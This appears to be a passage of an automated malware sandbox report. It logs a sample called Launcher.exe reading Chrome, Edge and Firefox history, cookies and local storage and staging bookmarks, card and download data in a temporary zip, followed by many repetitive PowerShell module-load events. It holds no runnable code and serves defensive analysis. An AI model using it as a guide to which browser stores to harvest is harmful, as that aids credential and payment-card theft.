        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers\bookmarks.json VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers\cards.json VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-jfOw\Browsers\downloads.json VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-aqpx.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-aqpx.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-aqpx.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
